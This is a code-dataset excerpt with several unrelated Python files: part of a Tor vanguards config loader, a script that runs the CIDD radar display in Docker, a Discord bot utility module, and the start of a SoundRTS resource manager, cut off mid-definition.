set_options_from_module(config, sys.modules[__name__], "Global")
set_options_from_module(config, vanguards, "Vanguards")
set_options_from_module(config, bandguards, "Bandguards")
set_options_from_module(config, rendguard, "Rendguard")
set_options_from_module(config, rendguard, "Logguard")
return config
def apply_config(config_file):
config = SafeConfigParser(allow_no_value=True)
config.readfp(open(config_file, "r"))
get_options_for_module(config, sys.modules[__name__], "Global")
get_options_for_module(config, vanguards, "Vanguards")
get_options_for_module(config, bandguards, "Bandguards")
get_options_for_module(config, rendguard, "Rendguard")
get_options_for_module(config, rendguard, "Logguard")
# Special cased CLOSE_CIRCUITS option has to be transfered
# to the control.py module
setattr(control, "_CLOSE_CIRCUITS", CLOSE_CIRCUITS)
plog("NOTICE", "Vanguards successfilly applied config options from "+
config_file)
| true | true |
1c333aa93800b8a44a18eb736edabe8885f9321e | 6,000 | py | Python | cidd/run-cidd-in-docker.py | NCAR/lrose-displays | c12e98c6890a5efdd4abe95a36b9004e0d83fe74 | [
"BSD-2-Clause"
] | null | null | null | cidd/run-cidd-in-docker.py | NCAR/lrose-displays | c12e98c6890a5efdd4abe95a36b9004e0d83fe74 | [
"BSD-2-Clause"
] | null | null | null | cidd/run-cidd-in-docker.py | NCAR/lrose-displays | c12e98c6890a5efdd4abe95a36b9004e0d83fe74 | [
"BSD-2-Clause"
] | 2 | 2021-07-02T06:20:59.000Z | 2022-01-28T06:23:58.000Z | #!/usr/bin/env python
#===========================================================================
#
# Run CIDD in docker. Wrapper script.
#
# This script performs the following steps:
#
# 1. parse the command-line options (docker image, CIDD params
#    file name / URL / local path)
# 2. detect the host OS (Linux vs macOS with XQuartz)
# 3. build the DISPLAY environment setting for X11 forwarding
# 4. run CIDD from the specified docker image with that display
#
# (The previous step list here described an lrose-core source build and
# did not match this wrapper script.)
#
# Use --help to see the command line options.
#
#===========================================================================
from __future__ import print_function
import os
import sys
from sys import platform
import shutil
import subprocess
from optparse import OptionParser
import time
from datetime import datetime
from datetime import date
from datetime import timedelta
def main():
    """Parse the command line, build the docker command, and launch CIDD.

    Determines the X display forwarding arguments (differently on macOS
    vs Linux), optionally mounts a local params file, then runs the
    docker image via shellCmd(). Exits the process when done.
    """

    global options

    # parse the command line
    thisScriptName = os.path.basename(__file__)

    usage = "usage: " + thisScriptName + " [options]"
    homeDir = os.environ['HOME']

    parser = OptionParser(usage)
    parser.add_option('--debug',
                      dest='debug', default=True,
                      action="store_true",
                      help='Set debugging on')
    parser.add_option('--verbose',
                      dest='verbose', default=False,
                      action="store_true",
                      help='Set verbose debugging on')
    parser.add_option('--docker_image',
                      dest='docker_image',
                      default='nsflrose/lrose-cidd',
                      help='Set the docker image to run. Should be in DockerHub.')
    parser.add_option('--params',
                      dest='params',
                      default='',
                      help="Set params file name. For example: 'CIDD.pecan'. In this case the URL would be 'http://front.eol.ucar.edu/displayParams/CIDD.pecan'. i.e. the param file name will be appended to the URL. If the --params option is not used, then the params_url will be used instead.")
    parser.add_option('--params_url',
                      dest='params_url',
                      default='http://front.eol.ucar.edu/displayParams/CIDD.pecan',
                      help='Set the full URL for CIDD params file. This activates if the --params option is not used.')
    parser.add_option('--params_local',
                      dest='params_local',
                      default='',
                      help="Set path of local params file. This will be provided to CIDD running in the container.")

    (options, args) = parser.parse_args()

    # check OS - is this a mac?
    global isOsx
    isOsx = False
    if (platform.find("darwin") == 0):
        isOsx = True

    # set DISPLAY string
    if (isOsx):
        # APPLE OSX: find the host IP address and the Xquartz display number
        ipAddr = "localhost"
        ifconfig = subprocess.check_output(['ifconfig']).decode('ascii')
        for line in ifconfig.split("\n"):
            if ((line.find("127.0.0.1") < 0) and
                line.find("inet ") >= 0):
                # Fixed: this previously assigned to a differently-cased
                # variable ('ipaddr'), so 'ipAddr' always stayed "localhost"
                # in the printout while the DISPLAY string used 'ipaddr',
                # which raised NameError when no interface matched.
                ipAddr = line.split()[1]
        print("ipAddr: ", ipAddr, file=sys.stderr)
        displayNum = ":0"
        ps = subprocess.check_output(['ps', '-e']).decode('ascii')
        for line in ps.split("\n"):
            if ((line.find("xinit") < 0) and
                (line.find("Xquartz") >= 0) and
                (line.find("listen") >= 0)):
                displayNum = line.split()[4]
        displayStr = "-e DISPLAY=" + ipAddr + displayNum
    else:
        # LINUX: pass the DISPLAY env var and the X11 socket through
        displayStr = "-e DISPLAY -v /tmp/.X11-unix:/tmp/.X11-unix"

    # debug
    if (options.debug):
        print("Running %s:" % thisScriptName, file=sys.stderr)
        print("  docker image: ", options.docker_image, file=sys.stderr)
        print("  CIDD params URL: ", options.params_url, file=sys.stderr)
        if (isOsx):
            print("  OS: this is a mac", file=sys.stderr)
        else:
            print("  OS: this is NOT a mac", file=sys.stderr)
        print("  displayStr: ", displayStr, file=sys.stderr)

    # for local params make copy into /tmp so docker can mount it
    paramsLocal = False
    localName = os.path.basename(options.params_local)
    tmpDir = "/tmp/cidd_params"
    if (len(options.params_local) > 0):
        paramsLocal = True
        try:
            os.makedirs(tmpDir)
        except:
            if (options.verbose):
                print("Info exists: ", tmpDir, file=sys.stderr)
        shellCmd("rsync -av " + options.params_local + " " + tmpDir)

    # set up call for running docker
    cmd = "docker run -v $HOME/.Xauthority:/root/.Xauthority "
    cmd += "-v /tmp/cidd_images:/root/images "
    if (paramsLocal):
        cmd += "-v /tmp/cidd_params:/root/params "
    cmd += displayStr + " "
    cmd += options.docker_image + " "
    cmd += "/usr/local/cidd/bin/CIDD -font fixed -p "
    if (paramsLocal):
        cmd += "/root/params/" + localName
    elif (len(options.params) > 0):
        cmd += "http://front.eol.ucar.edu/displayParams/" + options.params
    else:
        cmd += options.params_url
    if (options.verbose):
        cmd += " -v 2"

    # run the command
    shellCmd(cmd)

    # exit
    sys.exit(0)
########################################################################
# Run a command in a shell, wait for it to complete
def shellCmd(cmd):
    """Run *cmd* through a shell, exiting the script on failure."""

    print("Running cmd:", cmd, file=sys.stderr)
    try:
        retcode = subprocess.check_call(cmd, shell=True)
    except OSError as e:
        # the shell itself could not be launched
        print("Execution failed:", e, file=sys.stderr)
        sys.exit(1)

    if retcode != 0:
        print("Child exited with code: ", retcode, file=sys.stderr)
        sys.exit(1)
    if (options.verbose):
        print("Child returned code: ", retcode, file=sys.stderr)

    print("    done", file=sys.stderr)
########################################################################
# Script entry point: run main() only when executed directly,
# not when imported as a module.

if __name__ == "__main__":
    main()
| 31.413613 | 294 | 0.543667 |
from __future__ import print_function
import os
import sys
from sys import platform
import shutil
import subprocess
from optparse import OptionParser
import time
from datetime import datetime
from datetime import date
from datetime import timedelta
def main():
global options
thisScriptName = os.path.basename(__file__)
usage = "usage: " + thisScriptName + " [options]"
homeDir = os.environ['HOME']
parser = OptionParser(usage)
parser.add_option('--debug',
dest='debug', default=True,
action="store_true",
help='Set debugging on')
parser.add_option('--verbose',
dest='verbose', default=False,
action="store_true",
help='Set verbose debugging on')
parser.add_option('--docker_image',
dest='docker_image',
default='nsflrose/lrose-cidd',
help='Set the docker image to run. Should be in DockerHub.')
parser.add_option('--params',
dest='params',
default='',
help="Set params file name. For example: 'CIDD.pecan'. In this case the URL would be 'http://front.eol.ucar.edu/displayParams/CIDD.pecan'. i.e. the param file name will be appended to the URL. If the --params option is not used, then the params_url will be used instead.")
parser.add_option('--params_url',
dest='params_url',
default='http://front.eol.ucar.edu/displayParams/CIDD.pecan',
help='Set the full URL for CIDD params file. This activates if the --params option is not used.')
parser.add_option('--params_local',
dest='params_local',
default='',
help="Set path of local params file. This will be provided to CIDD running in the container.")
(options, args) = parser.parse_args()
global isOsx
isOsx = False
if (platform.find("darwin") == 0):
isOsx = True
if (isOsx):
ipAddr = "localhost"
ifconfig = subprocess.check_output(['ifconfig']).decode('ascii')
for line in ifconfig.split("\n"):
if ((line.find("127.0.0.1") < 0) and
line.find("inet ") >= 0):
ipaddr = line.split()[1]
print("ipAddr: ", ipAddr, file=sys.stderr)
displayNum = ":0"
ps = subprocess.check_output(['ps', '-e']).decode('ascii')
for line in ps.split("\n"):
if ((line.find("xinit") < 0) and
(line.find("Xquartz") >= 0) and
(line.find("listen") >= 0)):
displayNum = line.split()[4]
displayStr = "-e DISPLAY=" + ipaddr + displayNum
else:
displayStr = "-e DISPLAY -v /tmp/.X11-unix:/tmp/.X11-unix"
if (options.debug):
print("Running %s:" % thisScriptName, file=sys.stderr)
print(" docker image: ", options.docker_image, file=sys.stderr)
print(" CIDD params URL: ", options.params_url, file=sys.stderr)
if (isOsx):
print(" OS: this is a mac", file=sys.stderr)
else:
print(" OS: this is NOT a mac", file=sys.stderr)
print(" displayStr: ", displayStr, file=sys.stderr)
paramsLocal = False
localName = os.path.basename(options.params_local)
tmpDir = "/tmp/cidd_params"
if (len(options.params_local) > 0):
paramsLocal = True
try:
os.makedirs(tmpDir)
except:
if (options.verbose):
print("Info exists: ", tmpDir, file=sys.stderr)
shellCmd("rsync -av " + options.params_local + " " + tmpDir)
cmd = "docker run -v $HOME/.Xauthority:/root/.Xauthority "
cmd += "-v /tmp/cidd_images:/root/images "
if (paramsLocal):
cmd += "-v /tmp/cidd_params:/root/params "
cmd += displayStr + " "
cmd += options.docker_image + " "
cmd += "/usr/local/cidd/bin/CIDD -font fixed -p "
if (paramsLocal):
cmd += "/root/params/" + localName
elif (len(options.params) > 0):
cmd += "http://front.eol.ucar.edu/displayParams/" + options.params
else:
cmd += options.params_url
if (options.verbose):
cmd += " -v 2"
shellCmd(cmd)
sys.exit(0)
| true | true |
1c333b08d4042cb9cf835653ded7ce018942773f | 154 | py | Python | src/python-village/ini4-conditions-and-loops.py | spencerking/rosalind | 66c50378813abf7b9cc535a963aeb9249d8a3ed7 | [
"BSD-3-Clause"
] | null | null | null | src/python-village/ini4-conditions-and-loops.py | spencerking/rosalind | 66c50378813abf7b9cc535a963aeb9249d8a3ed7 | [
"BSD-3-Clause"
] | null | null | null | src/python-village/ini4-conditions-and-loops.py | spencerking/rosalind | 66c50378813abf7b9cc535a963aeb9249d8a3ed7 | [
"BSD-3-Clause"
] | null | null | null | def main(a, b):
result = 0
for i in range(a, b+1):
if i % 2 != 0:
result += i
return result
print(main(4862, 9002))
| 15.4 | 27 | 0.461039 | def main(a, b):
result = 0
for i in range(a, b+1):
if i % 2 != 0:
result += i
return result
print(main(4862, 9002))
| true | true |
1c333c5a0e8d89b3154871874c0ce9f7c532675b | 13,510 | py | Python | discordSuperUtils/base.py | StawaDev/discord-super-utils | 2734700c82dba1ed28131535d86b5a0b260ac824 | [
"MIT"
] | null | null | null | discordSuperUtils/base.py | StawaDev/discord-super-utils | 2734700c82dba1ed28131535d86b5a0b260ac824 | [
"MIT"
] | null | null | null | discordSuperUtils/base.py | StawaDev/discord-super-utils | 2734700c82dba1ed28131535d86b5a0b260ac824 | [
"MIT"
] | null | null | null | from __future__ import annotations
import asyncio
import dataclasses
import inspect
import logging
from dataclasses import dataclass
from typing import (
List,
Any,
Iterable,
Optional,
TYPE_CHECKING,
Union,
Tuple,
Callable,
Dict,
Coroutine,
)
import aiomysql
try:
import aiopg
except ImportError:
aiopg = None
logging.warning(
"Aiopg is not installed correctly, postgres databases are not supported."
)
import aiosqlite
import discord
from motor import motor_asyncio
if TYPE_CHECKING:
from discord.ext import commands
from .database import Database
from datetime import timedelta
__all__ = (
"COLUMN_TYPES",
"DatabaseNotConnected",
"InvalidGenerator",
"get_generator_response",
"maybe_coroutine",
"generate_column_types",
"questionnaire",
"EventManager",
"create_task",
"CogManager",
"DatabaseChecker",
"CacheBased",
)
# Maps each supported database driver type to the concrete SQL names of the
# abstract column types used by the managers ("snowflake", "string", ...).
COLUMN_TYPES = {
    motor_asyncio.AsyncIOMotorDatabase: None,  # mongo does not require any columns
    aiosqlite.core.Connection: {
        "snowflake": "INTEGER",
        "string": "TEXT",
        "number": "INTEGER",
        "smallnumber": "INTEGER",
    },
    aiomysql.pool.Pool: {
        "snowflake": "BIGINT",
        "string": "TEXT",
        "number": "INT",
        "smallnumber": "SMALLINT",
    },
}

# Postgres support is optional: only register its column types when aiopg
# imported successfully above.
if aiopg:
    COLUMN_TYPES[aiopg.pool.Pool] = {
        "snowflake": "BIGINT",
        "string": "TEXT",
        "number": "INT",
        "smallnumber": "SMALLINT",
    }
class DatabaseNotConnected(Exception):
    """Raised when a manager method that requires a database is used before a database has been connected."""
@dataclass
class CacheBased:
    """
    Represents a cache manager that manages member cache.

    The internal cache dict is cleared wholesale every ``wipe_cache_delay``.
    """

    bot: commands.Bot
    wipe_cache_delay: timedelta
    # Internal cache storage; excluded from the constructor and repr.
    _cache: dict = dataclasses.field(default_factory=dict, init=False, repr=False)

    def __post_init__(self):
        # Start the background wipe loop as soon as the instance is built.
        # NOTE(review): asyncio.get_event_loop() outside a running loop is
        # deprecated in recent Python -- confirm a loop exists when
        # instances are created.
        asyncio.get_event_loop().create_task(self.__wipe_cache())

    async def __wipe_cache(self) -> None:
        """
        |coro|

        Periodically wipes the member cache until the bot closes.

        :return: None
        :rtype: None
        """

        while not self.bot.is_closed():
            await asyncio.sleep(self.wipe_cache_delay.total_seconds())
            self._cache = {}  # drop every entry at once
class InvalidGenerator(Exception):
    """Raised when an unsupported generator object is supplied."""

    __slots__ = ("generator",)

    def __init__(self, generator):
        # keep the offending object around for callers that want to inspect it
        self.generator = generator
        message = f"Generator of type {type(generator)!r} is not supported."
        super().__init__(message)
async def maybe_coroutine(function: Callable, *args, **kwargs) -> Any:
    """
    |coro|

    Call ``function`` with the given arguments and return its result,
    awaiting it first when the call produces an awaitable.

    :param Callable function: The callable to invoke.
    :param args: Positional arguments.
    :param kwargs: Keyword arguments.
    :return: The (awaited) return value.
    :rtype: Any
    """

    result = function(*args, **kwargs)
    return await result if inspect.isawaitable(result) else result
def get_generator_response(generator: Any, generator_type: Any, *args, **kwargs) -> Any:
    """
    Invoke the ``generate`` method of *generator* and return its result.

    Accepts either an instance of *generator_type* or the class itself
    (instantiating it first unless ``generate`` is already bound).

    :param generator: The generator object or class.
    :type generator: Any
    :param generator_type: The expected generator type.
    :type generator_type: Any
    :param args: Positional arguments forwarded to ``generate``.
    :param kwargs: Keyword arguments forwarded to ``generate``.
    :return: The generator response.
    :rtype: Any
    :raises InvalidGenerator: *generator* matches neither form.
    """

    if inspect.isclass(generator) and issubclass(generator, generator_type):
        generate = generator.generate
        if not inspect.ismethod(generate):
            # plain function on the class: build an instance to bind it
            generate = generator().generate
        return generate(*args, **kwargs)

    if isinstance(generator, generator_type):
        return generator.generate(*args, **kwargs)

    raise InvalidGenerator(generator)
def generate_column_types(
    types: Iterable[str], database_type: Any
) -> Optional[List[str]]:
    """
    Map abstract column type names to the concrete names for a database type.

    :param types: The abstract column types (e.g. "snowflake", "string").
    :type types: Iterable[str]
    :param database_type: The database driver type.
    :type database_type: Any
    :return: The concrete column types, or None for schemaless databases.
    :rtype: Optional[List[str]]
    """

    mapping = COLUMN_TYPES.get(database_type)
    return None if mapping is None else [mapping[name] for name in types]
async def questionnaire(
    ctx: commands.Context,
    questions: Iterable[Union[str, discord.Embed]],
    public: bool = False,
    timeout: Union[float, int] = 30,
    member: discord.Member = None,
) -> Tuple[List[str], bool]:
    """
    |coro|

    Questions the member using a "quiz" and returns the answers.
    The questionnaire can be used without a specific member and be public.
    If no member was passed and the questionnaire public argument is true, a ValueError will be raised.

    :raises: ValueError: The questionnaire is private and no member was provided.
    :param ctx: The context (where the questionnaire will ask the questions).
    :type ctx: commands.Context
    :param questions: The questions the questionnaire will ask.
    :type questions: Iterable[Union[str, discord.Embed]]
    :param public: A bool indicating if the questionnaire is public.
    :type public: bool
    :param timeout: The number of seconds until the questionnaire will stop and time out.
    :type timeout: Union[float, int]
    :param member: The member the questionnaire will get the answers from.
    :type member: discord.Member
    :return: The answers and a boolean indicating if the questionnaire timed out.
    :rtype: Tuple[List[str], bool]
    """

    answers = []
    timed_out = False

    if not public and not member:
        raise ValueError("The questionnaire is private and no member was provided.")

    def checks(msg):
        # Public: accept any message in this channel.
        # Private: only the target member's messages in this channel.
        return (
            msg.channel == ctx.channel
            if public
            else msg.channel == ctx.channel and msg.author == member
        )

    for question in questions:
        # Send the question either as plain text or as an embed.
        if isinstance(question, str):
            await ctx.send(question)
        elif isinstance(question, discord.Embed):
            await ctx.send(embed=question)
        else:
            raise TypeError("Question must be of type 'str' or 'discord.Embed'.")

        try:
            message = await ctx.bot.wait_for("message", check=checks, timeout=timeout)
        except asyncio.TimeoutError:
            # Stop early; answers gathered so far are still returned.
            timed_out = True
            break

        answers.append(message.content)

    return answers, timed_out
@dataclass
class EventManager:
    """
    Registry that dispatches named events to asynchronous listeners.
    """

    events: dict = dataclasses.field(default_factory=dict, init=False)

    async def call_event(self, name: str, *args, **kwargs) -> None:
        """
        Await every listener registered under ``name``, in order.

        :param name: The event name.
        :type name: str
        :param args: Positional arguments forwarded to each listener.
        :param kwargs: Keyword arguments forwarded to each listener.
        :return: None
        :rtype: None
        """

        for listener in self.events.get(name, ()):
            await listener(*args, **kwargs)

    def event(self, name: str = None) -> Callable:
        """
        Decorator that registers the decorated coroutine as a listener.

        :param name: The event name (defaults to the function name).
        :type name: str
        :return: The decorator.
        :rtype: Callable
        """

        def inner(func):
            self.add_event(func, name)
            return func

        return inner

    def add_event(self, func: Callable, name: str = None) -> None:
        """
        Register an async listener under the event name.

        :param func: The listener coroutine function.
        :type func: Callable
        :param name: The event name (defaults to the function name).
        :type name: str
        :return: None
        :rtype: None
        :raises: TypeError: The listener isn't async.
        """

        key = name if name else func.__name__

        if not asyncio.iscoroutinefunction(func):
            raise TypeError("Listeners must be async.")

        self.events.setdefault(key, []).append(func)

    def remove_event(self, func: Callable, name: str = None) -> None:
        """
        Unregister a listener from the event name, if present.

        :param func: The listener coroutine function.
        :type func: Callable
        :param name: The event name (defaults to the function name).
        :type name: str
        :return: None
        :rtype: None
        """

        key = name if name else func.__name__

        if key in self.events:
            self.events[key].remove(func)
def handle_task_exceptions(task: asyncio.Task) -> None:
    """
    Done-callback that surfaces a task's exception, ignoring cancellation.

    Fixed: the previous ``except Exception as e: raise e`` clause was a
    no-op that only rewrote the traceback origin; any exception stored in
    the task propagates out of ``task.result()`` regardless.

    :param asyncio.Task task: The completed task.
    :return: None
    :rtype: None
    """

    try:
        task.result()
    except asyncio.CancelledError:
        pass  # cancellation is expected, not an error
def create_task(loop: asyncio.AbstractEventLoop, coroutine: Coroutine) -> None:
    """
    Creates a task on the loop and attaches the exception-handling callback.

    :param asyncio.AbstractEventLoop loop: The loop to run the coroutine on.
    :param Coroutine coroutine: The coroutine.
    :return: None
    :rtype: None
    """

    try:
        task = loop.create_task(coroutine)
        task.add_done_callback(handle_task_exceptions)
    except RuntimeError:
        # loop.create_task raises RuntimeError when the loop is closed;
        # scheduling is silently skipped in that case.
        pass
class CogManager:
    """
    A CogManager which helps the user use the managers inside discord cogs.
    """

    class Cog:
        """
        The internal Cog class: scans its own attributes for decorated
        listeners and registers them on the matching managers.
        """

        def __init__(self, managers: List = None):
            listeners = {}
            managers = [] if managers is None else managers

            # Resolve every attribute once so decorated methods are bound.
            attribute_objects = [getattr(self, attr) for attr in dir(self)]

            # Group attributes marked by CogManager.event by their manager type.
            for attr in attribute_objects:
                listener_type = getattr(attr, "_listener_type", None)
                if listener_type:
                    if listener_type in listeners:
                        listeners[listener_type].append(attr)
                    else:
                        listeners[listener_type] = [attr]

            # No managers supplied: use the cog's own attributes whose type
            # matches a listener's manager type.
            managers = managers or [
                attr for attr in attribute_objects if type(attr) in listeners
            ]

            # NOTE(review): every listener of every type is added to every
            # manager; event_type is not used to match listener to manager --
            # confirm this cross-registration is intended.
            for event_type in listeners:
                for manager in managers:
                    for event in listeners[event_type]:
                        manager.add_event(event)

    @staticmethod
    def event(manager_type: Any) -> Callable:
        """
        Marks the decorated coroutine as a listener for the given manager type.

        :param manager_type: The manager type of the event.
        :type manager_type: Any
        :rtype: Callable
        :return: The inner function.
        :raises: TypeError: The listener isn't async.
        """

        def decorator(func):
            if not inspect.iscoroutinefunction(func):
                raise TypeError("Listeners must be async.")

            # Tag the function so Cog.__init__ can find it later.
            func._listener_type = manager_type
            return func

        return decorator
return decorator
@dataclass
class DatabaseChecker(EventManager):
    """
    A database checker which makes sure the database is connected to a manager
    and handles the table creation.
    """

    tables_column_data: List[Dict[str, str]]
    table_identifiers: List[str]

    database: Optional[Database] = dataclasses.field(default=None, init=False)
    tables: Dict[str, str] = dataclasses.field(default_factory=dict, init=False)

    @staticmethod
    def uses_database(func):
        """Decorator: ensure a database is connected before running ``func``."""

        def inner(self, *args, **kwargs):
            self._check_database()
            return func(self, *args, **kwargs)

        return inner

    def _check_database(self, raise_error: bool = True) -> bool:
        """
        A function which checks if the database is connected.

        :param raise_error: A bool indicating if the function should raise an error
            if the database is not connected.
        :type raise_error: bool
        :rtype: bool
        :return: If the database is connected.
        :raises: DatabaseNotConnected: The database is not connected.
        """

        if not self.database:
            # Fixed: this previously printed "Not Connected" and ignored
            # raise_error, so @uses_database never actually blocked calls
            # made before connect_to_database().
            if raise_error:
                raise DatabaseNotConnected
            return False

        return True

    async def connect_to_database(
        self, database: Database, tables: List[str] = None
    ) -> None:
        """
        |coro|

        Connects to the database and creates the managed tables if missing.
        Calls on_database_connect when connected.

        :param database: The database to connect to.
        :type database: Database
        :param tables: The tables to create (incase they do not exist).
        :type tables: List[str]
        :rtype: None
        :return: None
        """

        # Fall back to the identifiers when the caller's list is absent or
        # does not line up one-to-one with the identifiers.
        if not tables or len(tables) != len(self.table_identifiers):
            tables = self.table_identifiers

        for table, table_data, identifier in zip(
            tables, self.tables_column_data, self.table_identifiers
        ):
            types = generate_column_types(table_data.values(), type(database.database))

            await database.create_table(
                table, dict(zip(list(table_data), types)) if types else None, True
            )

            self.database = database
            self.tables[identifier] = table

        await self.call_event("on_database_connect")
| 27.237903 | 117 | 0.623316 | from __future__ import annotations
import asyncio
import dataclasses
import inspect
import logging
from dataclasses import dataclass
from typing import (
List,
Any,
Iterable,
Optional,
TYPE_CHECKING,
Union,
Tuple,
Callable,
Dict,
Coroutine,
)
import aiomysql
try:
import aiopg
except ImportError:
aiopg = None
logging.warning(
"Aiopg is not installed correctly, postgres databases are not supported."
)
import aiosqlite
import discord
from motor import motor_asyncio
if TYPE_CHECKING:
from discord.ext import commands
from .database import Database
from datetime import timedelta
__all__ = (
"COLUMN_TYPES",
"DatabaseNotConnected",
"InvalidGenerator",
"get_generator_response",
"maybe_coroutine",
"generate_column_types",
"questionnaire",
"EventManager",
"create_task",
"CogManager",
"DatabaseChecker",
"CacheBased",
)
COLUMN_TYPES = {
motor_asyncio.AsyncIOMotorDatabase: None,
aiosqlite.core.Connection: {
"snowflake": "INTEGER",
"string": "TEXT",
"number": "INTEGER",
"smallnumber": "INTEGER",
},
aiomysql.pool.Pool: {
"snowflake": "BIGINT",
"string": "TEXT",
"number": "INT",
"smallnumber": "SMALLINT",
},
}
if aiopg:
COLUMN_TYPES[aiopg.pool.Pool] = {
"snowflake": "BIGINT",
"string": "TEXT",
"number": "INT",
"smallnumber": "SMALLINT",
}
class DatabaseNotConnected(Exception):
@dataclass
class CacheBased:
bot: commands.Bot
wipe_cache_delay: timedelta
_cache: dict = dataclasses.field(default_factory=dict, init=False, repr=False)
def __post_init__(self):
asyncio.get_event_loop().create_task(self.__wipe_cache())
async def __wipe_cache(self) -> None:
while not self.bot.is_closed():
await asyncio.sleep(self.wipe_cache_delay.total_seconds())
self._cache = {}
class InvalidGenerator(Exception):
__slots__ = ("generator",)
def __init__(self, generator):
self.generator = generator
super().__init__(
f"Generator of type {type(self.generator)!r} is not supported."
)
async def maybe_coroutine(function: Callable, *args, **kwargs) -> Any:
value = function(*args, **kwargs)
if inspect.isawaitable(value):
return await value
return value
def get_generator_response(generator: Any, generator_type: Any, *args, **kwargs) -> Any:
if inspect.isclass(generator) and issubclass(generator, generator_type):
if inspect.ismethod(generator.generate):
return generator.generate(*args, **kwargs)
return generator().generate(*args, **kwargs)
if isinstance(generator, generator_type):
return generator.generate(*args, **kwargs)
raise InvalidGenerator(generator)
def generate_column_types(
types: Iterable[str], database_type: Any
) -> Optional[List[str]]:
database_type_configuration = COLUMN_TYPES.get(database_type)
if database_type_configuration is None:
return
return [database_type_configuration[x] for x in types]
async def questionnaire(
ctx: commands.Context,
questions: Iterable[Union[str, discord.Embed]],
public: bool = False,
timeout: Union[float, int] = 30,
member: discord.Member = None,
) -> Tuple[List[str], bool]:
answers = []
timed_out = False
if not public and not member:
raise ValueError("The questionnaire is private and no member was provided.")
def checks(msg):
return (
msg.channel == ctx.channel
if public
else msg.channel == ctx.channel and msg.author == member
)
for question in questions:
if isinstance(question, str):
await ctx.send(question)
elif isinstance(question, discord.Embed):
await ctx.send(embed=question)
else:
raise TypeError("Question must be of type 'str' or 'discord.Embed'.")
try:
message = await ctx.bot.wait_for("message", check=checks, timeout=timeout)
except asyncio.TimeoutError:
timed_out = True
break
answers.append(message.content)
return answers, timed_out
@dataclass
class EventManager:
events: dict = dataclasses.field(default_factory=dict, init=False)
async def call_event(self, name: str, *args, **kwargs) -> None:
if name in self.events:
for event in self.events[name]:
await event(*args, **kwargs)
def event(self, name: str = None) -> Callable:
def inner(func):
self.add_event(func, name)
return func
return inner
def add_event(self, func: Callable, name: str = None) -> None:
name = func.__name__ if not name else name
if not asyncio.iscoroutinefunction(func):
raise TypeError("Listeners must be async.")
if name in self.events:
self.events[name].append(func)
else:
self.events[name] = [func]
def remove_event(self, func: Callable, name: str = None) -> None:
name = func.__name__ if not name else name
if name in self.events:
self.events[name].remove(func)
def handle_task_exceptions(task: asyncio.Task) -> None:
try:
task.result()
except asyncio.CancelledError:
pass
except Exception as e:
raise e
def create_task(loop: asyncio.AbstractEventLoop, coroutine: Coroutine) -> None:
try:
task = loop.create_task(coroutine)
task.add_done_callback(handle_task_exceptions)
except RuntimeError:
pass
class CogManager:
class Cog:
def __init__(self, managers: List = None):
listeners = {}
managers = [] if managers is None else managers
attribute_objects = [getattr(self, attr) for attr in dir(self)]
for attr in attribute_objects:
listener_type = getattr(attr, "_listener_type", None)
if listener_type:
if listener_type in listeners:
listeners[listener_type].append(attr)
else:
listeners[listener_type] = [attr]
managers = managers or [
attr for attr in attribute_objects if type(attr) in listeners
]
for event_type in listeners:
for manager in managers:
for event in listeners[event_type]:
manager.add_event(event)
@staticmethod
def event(manager_type: Any) -> Callable:
def decorator(func):
if not inspect.iscoroutinefunction(func):
raise TypeError("Listeners must be async.")
func._listener_type = manager_type
return func
return decorator
@dataclass
class DatabaseChecker(EventManager):
tables_column_data: List[Dict[str, str]]
table_identifiers: List[str]
database: Optional[Database] = dataclasses.field(default=None, init=False)
tables: Dict[str, str] = dataclasses.field(default_factory=dict, init=False)
@staticmethod
def uses_database(func):
def inner(self, *args, **kwargs):
self._check_database()
return func(self, *args, **kwargs)
return inner
def _check_database(self, raise_error: bool = True) -> bool:
if not self.database:
print("Not Connected")
return False
return True
async def connect_to_database(
self, database: Database, tables: List[str] = None
) -> None:
if not tables or len(tables) != len(self.table_identifiers):
tables = self.table_identifiers
for table, table_data, identifier in zip(
tables, self.tables_column_data, self.table_identifiers
):
types = generate_column_types(table_data.values(), type(database.database))
await database.create_table(
table, dict(zip(list(table_data), types)) if types else None, True
)
self.database = database
self.tables[identifier] = table
await self.call_event("on_database_connect")
| true | true |
1c333c80bcf6e629732d06ee24c7f63afee6c56e | 1,861 | py | Python | soundrts/res.py | Finnboy94/soundrts | 284ffe2c507f4c9e44b4e5fa8c4ef05b6614c6c6 | [
"BSD-3-Clause"
] | 23 | 2015-04-02T16:54:08.000Z | 2022-03-02T09:48:04.000Z | soundrts/res.py | Finnboy94/soundrts | 284ffe2c507f4c9e44b4e5fa8c4ef05b6614c6c6 | [
"BSD-3-Clause"
] | 94 | 2015-03-25T21:05:45.000Z | 2021-12-22T20:05:42.000Z | soundrts/res.py | TifloDev/soundrts | 209695ed80b8746facdcb35f446f0f855c48da84 | [
"BSD-3-Clause"
] | 33 | 2015-05-27T05:53:14.000Z | 2021-12-08T02:45:44.000Z | """SoundRTS resource manager"""
import os
from . import config, options
from .lib.resource import ResourceLoader
from .paths import MAPS_PATHS
def get_all_packages_paths():
    """return the default "maps and mods" paths followed by the paths of the active packages"""
    # Package-manager support is currently disabled; only the built-in
    # MAPS_PATHS are returned.
    return MAPS_PATHS  # + package_manager.get_packages_paths()
if options.mods is not None:
mods = options.mods
else:
mods = config.mods
_r = ResourceLoader(mods, config.soundpacks, get_all_packages_paths())
mods = _r.mods
soundpacks = _r.soundpacks
get_text_file = _r.get_text_file
load_texts = _r.load_texts
get_sound_paths = _r.get_sound_paths
def reload_all():
    """Rescan mods/soundpacks, reload default sounds and the window caption."""
    global mods, soundpacks
    # Imported here, presumably to avoid a circular import at module load
    # (clientmedia depends on this module) -- TODO confirm.
    from .clientmedia import sounds, update_display_caption
    _r.update_mods_list(mods, soundpacks, get_all_packages_paths())
    # Mirror the loader's final lists back into the module globals.
    mods = _r.mods
    soundpacks = _r.soundpacks
    update_display_caption()
    sounds.load_default(_r)
def set_mods(new_mods):
    """Activate a new mods selection; reload resources only if it changed."""
    global mods
    if new_mods != mods:
        mods = new_mods
        reload_all()
def set_soundpacks(new_soundpacks):
    """Activate a new soundpacks selection; reload resources only if it changed."""
    global soundpacks
    if new_soundpacks != soundpacks:
        soundpacks = new_soundpacks
        reload_all()
# mods
def is_a_soundpack(path):
    """A package is a soundpack unless it contains rules.txt or ai.txt."""
    marker_files = ("rules.txt", "ai.txt")
    return not any(
        os.path.isfile(os.path.join(path, marker)) for marker in marker_files
    )
def is_a_mod(path):
    """A package is a mod when it is not a soundpack (it has rules.txt or ai.txt)."""
    return not is_a_soundpack(path)
def available_mods(check_mod_type=is_a_mod):
